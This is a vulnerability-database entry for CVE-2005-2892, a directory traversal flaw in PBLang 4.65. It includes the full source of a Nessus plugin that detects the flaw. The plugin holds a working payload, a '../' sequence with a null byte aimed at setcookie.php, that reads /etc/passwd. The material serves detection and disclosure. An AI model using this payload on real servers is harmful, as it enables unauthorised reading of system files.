Vulnerabilities > CVE-2005-2892 - Unspecified vulnerability in Pblang 4.65

047910
CVSS 0.0 - NONE
Attack vector
UNKNOWN
Attack complexity
UNKNOWN
Privileges required
UNKNOWN
Confidentiality impact
UNKNOWN
Integrity impact
UNKNOWN
Availability impact
UNKNOWN
pblang
nessus
exploit available
NVD
Published: 2005-09-14
Updated: 2024-11-21

Summary

Directory traversal vulnerability in setcookie.php in PBLang 4.65, and possibly earlier versions, allows remote attackers to read arbitrary files via ".." sequences and "%00" (trailing null byte) in the u parameter.

Vulnerable Configurations

Part Description Count
Application
Pblang
1

Exploit-Db

  • descriptionPBLang Local file include Vulnerability. CVE-2005-2892. Webapps exploit for php platform
    idEDB-ID:18590
    last seen2016-02-02
    modified2012-03-13
    published2012-03-13
    reporterNumber 7
    sourcehttps://www.exploit-db.com/download/18590/
    titlePBLang Local file include Vulnerability
  • descriptionPBLang 4.65 Bulletin Board System SetCookie.PHP Directory Traversal Vulnerability. CVE-2005-2892. Webapps exploit for php platform
    idEDB-ID:26231
    last seen2016-02-03
    modified2005-09-07
    published2005-09-07
    reporterrgod
    sourcehttps://www.exploit-db.com/download/26231/
    titlePBLang 4.65 Bulletin Board System SetCookie.PHP Directory Traversal Vulnerability

Nessus

NASL familyCGI abuses
NASL idPBLANG_MULT_FLAWS.NASL
descriptionThe remote host is running PBLang, a bulletin board system that uses flat files and is written in PHP. The version of PBLang installed on the remote suffers from several vulnerabilities, including remote code execution, information disclosure, cross-site scripting, and path disclosure.
last seen2020-06-01
modified2020-06-02
plugin id19594
published2005-09-08
reporterThis script is Copyright (C) 2005-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/19594
titlePBLang 4.65 Multiple Vulnerabilities
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description) {
  script_id(19594);
  script_version("1.21");

  script_cve_id("CVE-2005-2892", "CVE-2005-2893", "CVE-2005-2894", "CVE-2005-2895");
  script_bugtraq_id(14765, 14766);

  script_name(english:"PBLang 4.65 Multiple Vulnerabilities");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that suffers from
multiple flaws." );
 script_set_attribute(attribute:"description", value:
"The remote host is running PBLang, a bulletin board system that uses
flat files and is written in PHP. 

The version of PBLang installed on the remote suffers from several
vulnerabilities, including remote code execution, information
disclosure, cross-site scripting, and path disclosure." );
 # https://web.archive.org/web/20120402152849/http://retrogod.altervista.org/pblang465.html
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?86f6e038");
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2005/Sep/77");
 script_set_attribute(attribute:"solution", value:
"Unknown at this time." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"false");
 script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);

 script_set_attribute(attribute:"plugin_publication_date", value: "2005/09/08");
 script_set_attribute(attribute:"vuln_publication_date", value: "2005/09/06");
 script_cvs_date("Date: 2018/11/15 20:50:18");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();

  script_summary(english:"Checks for multiple vulnerabilities in PBLang");
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");
  script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");
  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/PHP");
  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);

# Loop through CGI directories.
foreach dir (cgi_dirs()) {
  # Try to exploit the flaw in setcookie.php to read /etc/passwd.
  r = http_send_recv3(method: "GET", 
    item:string(
      dir, "/setcookie.php?",
      "u=../../../../../../../../../../../../etc/passwd%00&",
      "plugin=", SCRIPT_NAME
    ),
    port:port
  );
  if (isnull(r)) exit(0);

  # There's a problem if there's an entry for root.
  if (egrep(string: r[2], pattern: "root:.*:0:[01]:")) {
    security_hole(port);
    set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);
    exit(0);
  }
}

References